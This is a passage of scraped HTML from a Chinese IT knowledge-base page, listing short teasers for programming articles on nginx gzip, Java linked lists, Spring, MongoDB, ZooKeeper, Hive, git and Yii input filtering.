随着nginx的发展,越来越多的网站使用nginx,因此nginx的优化变得越来越重要,今天我们来看看nginx的gzip压缩到底是怎么压缩的呢? gzip(GNU-ZIP)是一种压缩技术。经过gzip压缩后页面大小可以变为原来的30%甚至更小,这样,用</div> </li> <li><a href="/article/1958.htm" title="java-13.输入一个单向链表,输出该链表中倒数第 k 个节点" target="_blank">java-13.输入一个单向链表,输出该链表中倒数第 k 个节点</a> <span class="text-muted">bylijinnan</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>two cursors. Make the first cursor go K steps first. /* * 第 13 题:题目:输入一个单向链表,输出该链表中倒数第 k 个节点 */ public void displayKthItemsBackWard(ListNode head,int k){ ListNode p1=head,p2=head; </div> </li> <li><a href="/article/2085.htm" title="Spring源码学习-JdbcTemplate queryForObject" target="_blank">Spring源码学习-JdbcTemplate queryForObject</a> <span class="text-muted">bylijinnan</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a> <div>JdbcTemplate中有两个可能会混淆的queryForObject方法: 1. Object queryForObject(String sql, Object[] args, Class requiredType) 2. Object queryForObject(String sql, Object[] args, RowMapper rowMapper) 第1个方法是只查</div> </li> <li><a href="/article/2212.htm" title="[冰川时代]在冰川时代,我们需要什么样的技术?" target="_blank">[冰川时代]在冰川时代,我们需要什么样的技术?</a> <span class="text-muted">comsci</span> <a class="tag" taget="_blank" href="/search/%E6%8A%80%E6%9C%AF/1.htm">技术</a> <div>      看美国那边的气候情况....我有个感觉...是不是要进入小冰期了?      那么在小冰期里面...我们的户外活动肯定会出现很多问题...在室内呆着的情况会非常多...怎么在室内呆着而不发闷...怎么用最低的电力保证室内的温度.....这都需要技术手段...   &nb</div> </li> <li><a href="/article/2339.htm" title="js 获取浏览器型号" target="_blank">js 获取浏览器型号</a> <span class="text-muted">cuityang</span> <a class="tag" taget="_blank" href="/search/js/1.htm">js</a><a class="tag" taget="_blank" href="/search/%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">浏览器</a> <div>根据浏览器获取iphone和apk的下载地址 <!DOCTYPE html> <html> <head>     <meta charset="utf-8" content="text/html"/>     <meta name=</div> </li> <li><a href="/article/2466.htm" title="C# socks5详解 转" target="_blank">C# socks5详解 转</a> <span class="text-muted">dalan_123</span> <a class="tag" taget="_blank" href="/search/socket/1.htm">socket</a><a class="tag" taget="_blank" href="/search/C%23/1.htm">C#</a> <div>http://www.cnblogs.com/zhujiechang/archive/2008/10/21/1316308.html  这里主要讲的是用.NET实现基于Socket5下面的代理协议进行客户端的通讯,Socket4的实现是类似的,注意的事,这里不是讲用C#实现一个代理服务器,因为实现一个代理服务器需要实现很多协议,头大,而且现在市面上有很多现成的代理服务器用,性能又好,</div> </li> <li><a href="/article/2593.htm" title="运维 Centos问题汇总" target="_blank">运维 Centos问题汇总</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/%E4%BA%91%E4%B8%BB%E6%9C%BA/1.htm">云主机</a> <div>一、sh 脚本不执行的原因 sh脚本不执行的原因 只有2个 1.权限不够 2.sh脚本里路径没写完整。   二、解决You have new mail in /var/spool/mail/root 修改/usr/share/logwatch/default.conf/logwatch.conf配置文件 MailTo = MailFrom   三、查询连接数</div> </li> <li><a href="/article/2720.htm" title="Yii防注入攻击笔记" target="_blank">Yii防注入攻击笔记</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/WEB%E5%AE%89%E5%85%A8/1.htm">WEB安全</a><a class="tag" taget="_blank" href="/search/yii/1.htm">yii</a> <div>网站表单有注入漏洞须对所有用户输入的内容进行个过滤和检查,可以使用正则表达式或者直接输入字符判断,大部分是只允许输入字母和数字的,其它字符度不允许;对于内容复杂表单的内容,应该对html和script的符号进行转义替换:尤其是<,>,',"",&这几个符号 这里有个转义对照表: http://blog.csdn.net/xinzhu1990/articl</div> </li> <li><a href="/article/2847.htm" title="MongoDB简介[一]" target="_blank">MongoDB简介[一]</a> <span class="text-muted">eksliang</span> <a class="tag" taget="_blank" href="/search/mongodb/1.htm">mongodb</a><a class="tag" taget="_blank" href="/search/MongoDB%E7%AE%80%E4%BB%8B/1.htm">MongoDB简介</a> <div>MongoDB简介 转载请出自出处:http://eksliang.iteye.com/blog/2173288 1.1易于使用        MongoDB是一个面向文档的数据库,而不是关系型数据库。与关系型数据库相比,面向文档的数据库不再有行的概念,取而代之的是更为灵活的“文档”模型。        另外,不</div> </li> <li><a href="/article/2974.htm" title="zookeeper windows 入门安装和测试" target="_blank">zookeeper windows 入门安装和测试</a> <span class="text-muted">greemranqq</span> <a class="tag" taget="_blank" href="/search/zookeeper/1.htm">zookeeper</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E8%A3%85/1.htm">安装</a><a class="tag" taget="_blank" href="/search/%E5%88%86%E5%B8%83%E5%BC%8F/1.htm">分布式</a> <div>一、序言       以下是我对zookeeper 的一些理解:      zookeeper 作为一个服务注册信息存储的管理工具,好吧,这样说得很抽象,我们举个“栗子”。       栗子1号:       假设我是一家KTV的老板,我同时拥有5家KTV,我肯定得时刻监视</div> </li> <li><a href="/article/3101.htm" title="Spring之使用事务缘由(2-注解实现)" target="_blank">Spring之使用事务缘由(2-注解实现)</a> <span class="text-muted">ihuning</span> <a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a> <div>  Spring事务注解实现   1. 依赖包:     1.1 spring包:           spring-beans-4.0.0.RELEASE.jar           spring-context-4.0.0.</div> </li> <li><a href="/article/3228.htm" title="iOS App Launch Option" target="_blank">iOS App Launch Option</a> <span class="text-muted">啸笑天</span> <a class="tag" taget="_blank" href="/search/option/1.htm">option</a> <div>iOS 程序启动时总会调用application:didFinishLaunchingWithOptions:,其中第二个参数launchOptions为NSDictionary类型的对象,里面存储有此程序启动的原因。   launchOptions中的可能键值见UIApplication Class Reference的Launch Options Keys节 。 1、若用户直接</div> </li> <li><a href="/article/3355.htm" title="jdk与jre的区别(_)" target="_blank">jdk与jre的区别(_)</a> <span class="text-muted">macroli</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/jvm/1.htm">jvm</a><a class="tag" taget="_blank" href="/search/jdk/1.htm">jdk</a> <div>简单的说JDK是面向开发人员使用的SDK,它提供了Java的开发环境和运行环境。SDK是Software Development Kit 一般指软件开发包,可以包括函数库、编译程序等。  JDK就是Java Development Kit JRE是Java Runtime Enviroment是指Java的运行环境,是面向Java程序的使用者,而不是开发者。 如果安装了JDK,会发同你</div> </li> <li><a href="/article/3482.htm" title="Updates were rejected because the tip of your current branch is behind" target="_blank">Updates were rejected because the tip of your current branch is behind</a> <span class="text-muted">qiaolevip</span> <a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0%E6%B0%B8%E6%97%A0%E6%AD%A2%E5%A2%83/1.htm">学习永无止境</a><a class="tag" taget="_blank" href="/search/%E6%AF%8F%E5%A4%A9%E8%BF%9B%E6%AD%A5%E4%B8%80%E7%82%B9%E7%82%B9/1.htm">每天进步一点点</a><a class="tag" taget="_blank" href="/search/%E4%BC%97%E8%A7%82%E5%8D%83%E8%B1%A1/1.htm">众观千象</a><a class="tag" taget="_blank" href="/search/git/1.htm">git</a> <div>$ git push joe prod-2295-1 To git@git.dianrong.com:joe.le/dr-frontend.git ! [rejected] prod-2295-1 -> prod-2295-1 (non-fast-forward) error: failed to push some refs to 'git@git.dianron</div> </li> <li><a href="/article/3609.htm" title="[一起学Hive]之十四-Hive的元数据表结构详解" target="_blank">[一起学Hive]之十四-Hive的元数据表结构详解</a> <span class="text-muted">superlxw1234</span> <a class="tag" taget="_blank" href="/search/hive/1.htm">hive</a><a class="tag" taget="_blank" href="/search/hive%E5%85%83%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/1.htm">hive元数据结构</a> <div>关键字:Hive元数据、Hive元数据表结构   之前在 “[一起学Hive]之一–Hive概述,Hive是什么”中介绍过,Hive自己维护了一套元数据,用户通过HQL查询时候,Hive首先需要结合元数据,将HQL翻译成MapReduce去执行。 本文介绍一下Hive元数据中重要的一些表结构及用途,以Hive0.13为例。   文章最后面,会以一个示例来全面了解一下,</div> </li> <li><a href="/article/3736.htm" title="Spring 3.2.14,4.1.7,4.2.RC2发布" target="_blank">Spring 3.2.14,4.1.7,4.2.RC2发布</a> <span class="text-muted">wiselyman</span> <a class="tag" taget="_blank" href="/search/Spring+3/1.htm">Spring 3</a> <div>  Spring 3.2.14、4.1.7及4.2.RC2于6月30日发布。   其中Spring 3.2.1是一个维护版本(维护周期到2016-12-31截止),后续会继续根据需求和bug发布维护版本。此时,Spring官方强烈建议升级Spring框架至4.1.7 或者将要发布的4.2 。   其中Spring 4.1.7主要包含这些更新内容。 </div> </li> </ul> </div> </div> </div> <div> <div class="container"> <div class="indexes"> <strong>按字母分类:</strong> <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a> </div> </div> </div> <footer id="footer" class="mb30 mt30"> <div class="container"> <div class="footBglm"> <a target="_blank" href="/">首页</a> - <a target="_blank" href="/custom/about.htm">关于我们</a> - <a target="_blank" href="/search/Java/1.htm">站内搜索</a> - <a target="_blank" href="/sitemap.txt">Sitemap</a> - <a target="_blank" href="/custom/delete.htm">侵权投诉</a> </div> <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved. <!-- <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>--> </div> </div> </footer> <!-- 代码高亮 --> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script> <link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/> <script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script> </body> </html>